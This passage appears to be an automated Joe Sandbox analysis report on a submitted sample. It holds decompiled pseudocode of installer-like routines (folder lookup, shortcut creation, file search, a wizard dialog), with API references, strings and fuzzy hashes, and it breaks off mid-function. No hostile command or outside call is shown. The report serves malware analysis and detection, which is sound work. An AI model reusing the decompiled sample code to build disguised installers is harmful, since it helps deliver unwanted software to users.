0x00000000
0x00405c3b
0x00405bc6
0x00000000
0x00405b84
0x00405b89
0x00405b9f
0x00405ba4
0x00405ba7
0x00405c44
0x00405c44
0x00405c48
0x00405c50
0x00405c50
0x00000000
0x00405c48
0x00405bb1
0x00405c3f
0x00405c3f
0x00405c42
0x00000000
0x00000000
0x00000000
0x00405c42
0x00405b82
0x00405b55
0x00405b59
0x00000000
0x00000000
0x00405b5b
0x00405b5f
0x00000000
0x00000000
0x00405b61
0x00405b65
0x00000000
0x00405b67
0x00405b67
0x00000000
0x00405b67
0x00405b65
0x00405cca
0x00405cd4
0x00405ce0
0x00405ce0
0x00000000

APIs

GetVersion.KERNEL32(?,0041FC70,00000000,00404E5B,0041FC70,00000000), ref: 00405B4B
GetSystemDirectoryA.KERNEL32(ytxithcebq,00000400), ref: 00405BC6
GetWindowsDirectoryA.KERNEL32(ytxithcebq,00000400), ref: 00405BD9
SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00405C15
SHGetPathFromIDListA.SHELL32(00000000,ytxithcebq), ref: 00405C23
CoTaskMemFree.OLE32(00000000), ref: 00405C2E
lstrcatA.KERNEL32(ytxithcebq,\Microsoft\Internet Explorer\Quick Launch), ref: 00405C50
lstrlenA.KERNEL32(ytxithcebq,?,0041FC70,00000000,00404E5B,0041FC70,00000000), ref: 00405CA2

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 00405C4A
Software\Microsoft\Windows\CurrentVersion, xrefs: 00405B95
ytxithcebq, xrefs: 00405AD0, 00405B93, 00405BB0, 00405BC5, 00405BD8, 00405BF4, 00405C1F, 00405C4F, 00405C55, 00405C6D, 00405C80, 00405C9B, 00405CA1, 00405CAC, 00405CD6

Memory Dump Source

Source File: 00000000.00000002.655618767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.655607705.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655678725.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655695462.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655746163.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655768064.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655776920.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3NeufRwoxF.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$ytxithcebq
API String ID: 900638850-550629985
Opcode ID: 8c89faea656f75211a43bdfb02caabddeac7d8c4cf190b1a32756d1be722affe
Instruction ID: 02e69832ec688910c0edf1e4f77165a8fa6b6d990b95ba5e8d1c2d1c59892890
Opcode Fuzzy Hash: 8c89faea656f75211a43bdfb02caabddeac7d8c4cf190b1a32756d1be722affe
Instruction Fuzzy Hash: B251E371A08B19ABEB215B64CC84BBF3B74EB15714F14023BE911BA2D0D37C5982DE4E

Uniqueness

Uniqueness Score: -1.00%

Function 00402012, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134
comCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00402012() {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E004029E8(0xfffffff0);
				_t96 = E004029E8(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x2c)) = E004029E8(2);
				 *((intOrPtr*)(_t100 - 8)) = E004029E8(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x44)) = E004029E8(0x45);
				if(E004055E5(_t96) == 0) {
					E004029E8(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x407384, _t75, 1, 0x407374, _t44);
				if(_t44 < _t75) {
					L13:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407394, _t100 - 0x34);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\jones\\AppData\\Local\\Temp");
						_t81 =  *(_t100 - 0x14);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x14);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 8)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 8)),  *(_t100 - 0x14) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
						if(_t95 >= _t75) {
							_t95 = 0x80004005;
							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409360, 0x400) != 0) {
								_t69 =  *((intOrPtr*)(_t100 - 0x34));
								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409360, 1);
							}
						}
						_t66 =  *((intOrPtr*)(_t100 - 0x34));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L13;
					}
				}
				E00401423();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}

0x0040201b
0x00402025
0x0040202e
0x00402038
0x00402041
0x0040204b
0x0040204f
0x0040204f
0x00402054
0x00402065
0x0040206d
0x0040214d
0x0040214d
0x00402154
0x00402073
0x00402073
0x00402084
0x00402088
0x0040208e
0x00402098
0x0040209a
0x004020a5
0x004020a8
0x004020b5
0x004020b7
0x004020b9
0x004020c0
0x004020c3
0x004020c3
0x004020c6
0x004020d0
0x004020d8
0x004020dd
0x004020e9
0x004020e9
0x004020ec
0x004020f5
0x004020f8
0x00402101
0x00402106
0x00402118
0x00402127
0x00402129
0x00402135
0x00402135
0x00402127
0x00402137
0x0040213d
0x0040213d
0x00402140
0x00402146
0x0040214b
0x00402160
0x00000000
0x00000000
0x00000000
0x0040214b
0x00402156
0x00402880
0x0040288c

APIs

CoCreateInstance.OLE32(00407384,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402065
MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409360,00000400,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040211F

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 0040209D

Memory Dump Source

Source File: 00000000.00000002.655618767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.655607705.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655678725.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655695462.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655746163.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655768064.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655776920.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3NeufRwoxF.jbxd

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 123533781-47812868
Opcode ID: c224b754a24e27b0a3ecd9e0cc6c3a384ffadc9b3130a9beb9220e72134f7772
Instruction ID: 9a85de16ea5d7a81ede148d9b78cdb1ba9a910f30d2aff7a9c0f788a9809de35
Opcode Fuzzy Hash: c224b754a24e27b0a3ecd9e0cc6c3a384ffadc9b3130a9beb9220e72134f7772
Instruction Fuzzy Hash: 0E414DB5A00104AFDB00DFA4CD89E9E7BBABF49314B20416AF905EB2D1DA79DD41CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00402630, Relevance: 1.5, APIs: 1, Instructions: 29
fileCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E00402630(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E004029E8(2), _t19 - 0x1a4) != 0xffffffff) {
					E004059E3(__edi, _t6);
					_push(_t19 - 0x178);
					_push(__esi);
					E00405A85();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}

0x00402648
0x0040265c
0x00402667
0x00402668
0x004027a3
0x0040264a
0x0040264a
0x0040264c
0x0040264e
0x0040264e
0x00402880
0x0040288c

APIs

FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040263F

Memory Dump Source

Source File: 00000000.00000002.655618767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.655607705.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655678725.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655695462.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655746163.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655768064.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655776920.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3NeufRwoxF.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: e252be4d8dac41554fd361ab132364df58656f291f34e3e62bfafec942fe1f51
Instruction ID: 76eef0906e3fa6c86cf2ebea0eb1ad5f879b60bc34498b8afccad509cb3c3919
Opcode Fuzzy Hash: e252be4d8dac41554fd361ab132364df58656f291f34e3e62bfafec942fe1f51
Instruction Fuzzy Hash: 67F0A772A04100EED700EBB59D49EFE7778DF11324F6005BBE111B20C1C7B889419A2A

Uniqueness

Uniqueness Score: -1.00%

Function 0019E742, Relevance: .2, Instructions: 196COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.655529179.000000000019E000.00000040.00000001.sdmp, Offset: 0019E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_19e000_3NeufRwoxF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 195a289bea6c427d6dd0e94af631ce1939ca6bc38f5db606016c202de45f5cbb
Instruction ID: da27b0eeeb22cfcdb20be59fa909e4cc11dc3759e8481fa648621d01af2938ce
Opcode Fuzzy Hash: 195a289bea6c427d6dd0e94af631ce1939ca6bc38f5db606016c202de45f5cbb
Instruction Fuzzy Hash: 40618D31E00218AFCF20DFA4C884BAEBBF5BF58710F248459E915EB391EB749D018B55

Uniqueness

Uniqueness Score: -1.00%

Function 0019E956, Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.655529179.000000000019E000.00000040.00000001.sdmp, Offset: 0019E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_19e000_3NeufRwoxF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4324828f627b6bb0fb9c77ef1135b1a25c16c170ba8a3c28242676e39d3c830
Instruction ID: 04916d122f5df41da2de0222e7a70c3138ed4573e6333d511a45da5562e2d17b
Opcode Fuzzy Hash: f4324828f627b6bb0fb9c77ef1135b1a25c16c170ba8a3c28242676e39d3c830
Instruction Fuzzy Hash: D811C232A10119AFDF60EBAAD8888AEF7FDEF44794B5440AAF805D3211E770DE40C660

Uniqueness

Uniqueness Score: -1.00%

Function 0019EA46, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.655529179.000000000019E000.00000040.00000001.sdmp, Offset: 0019E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_19e000_3NeufRwoxF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16547e1fdedecc12c00c52f4e517689794c9225d74c133a4488530a871c9f38f
Instruction ID: f5ca90816626f9019444c25dbf02ba7d5c20f054033f7aa88eea6a22c9bf8743
Opcode Fuzzy Hash: 16547e1fdedecc12c00c52f4e517689794c9225d74c133a4488530a871c9f38f
Instruction Fuzzy Hash: 91E01A35764609DFCB54CBA8C981D65B3F8EB59320B154694F816CB3E1EB34EE00DA50

Uniqueness

Uniqueness Score: -1.00%

Function 0019EA84, Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.655529179.000000000019E000.00000040.00000001.sdmp, Offset: 0019E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_19e000_3NeufRwoxF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
Instruction ID: ce9049eb484b81c02fc9a693bf78150f04ddd4574011cc319159de2e65adc3e6
Opcode Fuzzy Hash: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
Instruction Fuzzy Hash: A8E08C363206108FCB60DA19D480852F3EAFB983B071A486AEC8AD3721C730FC0086A0

Uniqueness

Uniqueness Score: -1.00%

Function 0019EA07, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.655529179.000000000019E000.00000040.00000001.sdmp, Offset: 0019E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_19e000_3NeufRwoxF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40

Uniqueness

Uniqueness Score: -1.00%

Function 00403964, Relevance: 48.3, APIs: 32, Instructions: 345
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00403964(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x42047c = _t35;
					if(_t115 == 0x110) {
						 *0x423ea8 = _t125;
						 *0x420490 = GetDlgItem(_t125, 1);
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x41f458 = _t91;
						E00403E37(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x423688);
						 *0x42366c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x42047c = 1;
					}
					_t122 =  *0x4091bc; // 0xffffffff
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x423ec0;
					__eflags = _t122;
					if(_t122 < 0) {
						L34:
						E00403E83(0x40b);
						while(1) {
							_t37 =  *0x42047c;
							 *0x4091bc =  *0x4091bc + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 =  *0x4091bc; // 0xffffffff
							__eflags = _t39 -  *0x423ec4;
							if(_t39 ==  *0x423ec4) {
								E0040140B(1);
							}
							__eflags =  *0x42366c - _t133;
							if( *0x42366c != _t133) {
								break;
							}
							__eflags =  *0x4091bc -  *0x423ec4; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t116 =  *(_t130 + 0x14);
							E00405AA7(_t116, _t125, _t130, 0x42b800,  *((intOrPtr*)(_t130 + 0x24)));
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403E37(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
							_push(0xfffffc1b);
							E00403E37(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403E37(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x423f2c - _t133;
							_v32 = _t49;
							if( *0x423f2c != _t133) {
								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
							ShowWindow(_t49, _t116 & 0x00000008);
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
							E00403E59(_t116 & 0x00000002);
							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x41f458, _t117);
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push(1);
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
							__eflags =  *0x423f2c - _t133;
							if( *0x423f2c == _t133) {
								_push( *0x420490);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x41f458);
							}
							E00403E6C();
							E00405A85(0x420498, 0x4236a0);
							E00405AA7(0x420498, _t125, _t130,  &(0x420498[lstrlenA(0x420498)]),  *((intOrPtr*)(_t130 + 0x18)));
							SetWindowTextA(_t125, 0x420498);
							_push(_t133);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x423678);
									 *0x41fc68 = _t130;
									__eflags =  *_t130 - _t133;
									if( *_t130 <= _t133) {
										goto L58;
									}
									_t73 = CreateDialogParamA( *0x423ea0,  *_t130 +  *0x423680 & 0x0000ffff, _t125,  *(0x4091c0 +  *(_t130 + 4) * 4), _t130);
									__eflags = _t73 - _t133;
									 *0x423678 = _t73;
									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403E37(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x423678, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									_push(_t133);
									E00401389( *((intOrPtr*)(_t130 + 0xc)));
									__eflags =  *0x42366c - _t133;
									if( *0x42366c != _t133) {
										goto L61;
									}
									ShowWindow( *0x423678, 8);
									E00403E83(0x405);
									goto L58;
								}
								__eflags =  *0x423f2c - _t133;
								if( *0x423f2c != _t133) {
									goto L61;
								}
								__eflags =  *0x423f20 - _t133;
								if( *0x423f20 != _t133) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x423678);
						 *0x423ea8 = _t133;
						EndDialog(_t125,  *0x41f860);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x423678, 0x40f, 0, 1);
						__eflags =  *0x42366c;
						return 0 |  *0x42366c == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x420470, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x420470,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return E00403E9E(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x423678, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x423f2c - _t133;
										if( *0x423f2c == _t133) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x41f860 = 1;
											L21:
											_push(0x78);
											L22:
											E00403E10();
											goto L26;
										}
										E0040140B(_t127);
										 *0x41f860 = _t127;
										goto L21;
									}
									__eflags =  *0x4091bc - _t133; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x423678);
						 *0x423678 = _a12;
						L58:
						if( *0x421498 == _t133 &&  *0x423678 != _t133) {
							ShowWindow(_t125, 0xa);
							 *0x421498 = 1;
						}
						L61:
						return 0;
					}
				}
			}

0x0040396d
0x00403976
0x00403ab7
0x00403abb
0x00403abf
0x00403ac1
0x00403ac6
0x00403ad1
0x00403adc
0x00403ae1
0x00403ae3
0x00403ae5
0x00403ae8
0x00403aed
0x00403afb
0x00403b08
0x00403b0f
0x00403b0f
0x00403b10
0x00403b10
0x00403b15
0x00403b1b
0x00403b22
0x00403b28
0x00403b2a
0x00403b6a
0x00403b6f
0x00403b74
0x00403b74
0x00403b79
0x00403b82
0x00403b84
0x00403b89
0x00403b8f
0x00403b93
0x00403b93
0x00403b98
0x00403b9e
0x00000000
0x00000000
0x00403ba9
0x00403baf
0x00000000
0x00000000
0x00403bb8
0x00403bc0
0x00403bc5
0x00403bc8
0x00403bce
0x00403bd3
0x00403bd6
0x00403bdc
0x00403be1
0x00403be4
0x00403bea
0x00403bf2
0x00403bf8
0x00403bfe
0x00403c02
0x00403c09
0x00403c09
0x00403c09
0x00403c13
0x00403c25
0x00403c31
0x00403c36
0x00403c40
0x00403c46
0x00403c48
0x00403c4d
0x00403c4a
0x00403c4a
0x00403c4a
0x00403c5d
0x00403c75
0x00403c77
0x00403c7d
0x00403c92
0x00403c7f
0x00403c88
0x00403c8a
0x00403c8a
0x00403c98
0x00403ca8
0x00403cb9
0x00403cc0
0x00403cc6
0x00403cca
0x00403ccf
0x00403cd1
0x00000000
0x00403cd7
0x00403cd7
0x00403cd9
0x00000000
0x00000000
0x00403cdf
0x00403ce3
0x00403d08
0x00403d0e
0x00403d14
0x00403d16
0x00000000
0x00000000
0x00403d3c
0x00403d42
0x00403d44
0x00403d49
0x00000000
0x00000000
0x00403d4f
0x00403d52
0x00403d55
0x00403d6c
0x00403d78
0x00403d91
0x00403d97
0x00403d9b
0x00403da0
0x00403da6
0x00000000
0x00000000
0x00403db0
0x00403dbb
0x00000000
0x00403dbb
0x00403ce5
0x00403ceb
0x00000000
0x00000000
0x00403cf1
0x00403cf7
0x00000000
0x00000000
0x00000000
0x00403cfd
0x00403cd1
0x00403dc8
0x00403dd4
0x00403ddb
0x00000000
0x00403b2c
0x00403b2c
0x00403b2f
0x00403b62
0x00403b62
0x00403b64
0x00000000
0x00000000
0x00000000
0x00403b64
0x00403b31
0x00403b35
0x00403b3a
0x00403b3c
0x00000000
0x00000000
0x00403b4c
0x00403b54
0x00000000
0x00403b5a
0x00403988
0x00403988
0x0040398c
0x00403991
0x004039a0
0x004039a0
0x004039a9
0x004039b2
0x004039bd
0x004039bd
0x004039c9
0x004039e5
0x004039e8
0x004039fb
0x00403a01
0x00403aa4
0x00000000
0x00403aad
0x00403a07
0x00403a14
0x00403a16
0x00403a18
0x00403a37
0x00403a37
0x00403a3a
0x00403a3f
0x00403a42
0x00403a52
0x00403a53
0x00403a55
0x00403a8b
0x00403a9e
0x00000000
0x00403a9e
0x00403a57
0x00403a5d
0x00403a76
0x00403a7b
0x00403a7d
0x00000000
0x00000000
0x00403a7f
0x00403a6b
0x00403a6b
0x00403a6d
0x00403a6d
0x00000000
0x00403a6d
0x00403a60
0x00403a65
0x00000000
0x00403a65
0x00403a44
0x00403a4a
0x00000000
0x00000000
0x00403a4c
0x00000000
0x00403a4c
0x00403a3c
0x00000000
0x00403a3c
0x00403a22
0x00403a29
0x00403a2f
0x00403a31
0x00000000
0x00000000
0x00000000
0x00403a31
0x004039ed
0x00000000
0x004039cb
0x004039d1
0x004039db
0x00403de1
0x00403de7
0x00403df4
0x00403dfa
0x00403dfa
0x00403e04
0x00000000
0x00403e04
0x004039c9

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039A0
ShowWindow.USER32(?), ref: 004039BD
DestroyWindow.USER32 ref: 004039D1
SetWindowLongA.USER32 ref: 004039ED
GetDlgItem.USER32 ref: 00403A0E
SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403A22
IsWindowEnabled.USER32(00000000), ref: 00403A29
GetDlgItem.USER32 ref: 00403AD7
GetDlgItem.USER32 ref: 00403AE1
SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403AFB
SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403B4C
GetDlgItem.USER32 ref: 00403BF2
ShowWindow.USER32(00000000,?), ref: 00403C13
EnableWindow.USER32(?,?), ref: 00403C25
EnableWindow.USER32(?,?), ref: 00403C40
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403C56
EnableMenuItem.USER32 ref: 00403C5D
SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403C75
SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403C88
lstrlenA.KERNEL32(00420498,?,00420498,004236A0), ref: 00403CB1
SetWindowTextA.USER32(?,00420498), ref: 00403CC0
ShowWindow.USER32(?,0000000A), ref: 00403DF4

Memory Dump Source

Source File: 00000000.00000002.655618767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.655607705.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655678725.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655695462.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655746163.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655768064.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655776920.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3NeufRwoxF.jbxd

Similarity

API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
String ID:
API String ID: 184305955-0
Opcode ID: 71dbbfc470e5b7342f3a842f49b25357194f1f96d8345790fbe5660f06a32eef
Instruction ID: caafd2a66b76c4ae3962cc82e2ded254e31ce9ec1c8840106f3b43a2641cb278
Opcode Fuzzy Hash: 71dbbfc470e5b7342f3a842f49b25357194f1f96d8345790fbe5660f06a32eef
Instruction Fuzzy Hash: 95C1AF71A04204BBDB206F21ED85E2B7E7CEB05706F40453EF641B12E1C779AA429F6E

Uniqueness

Uniqueness Score: -1.00%

Function 00403F7F, Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 204
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00403F7F(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t103;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x420478 =  *0x420478 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403E9E(_a8, _a12, _t110);
						}
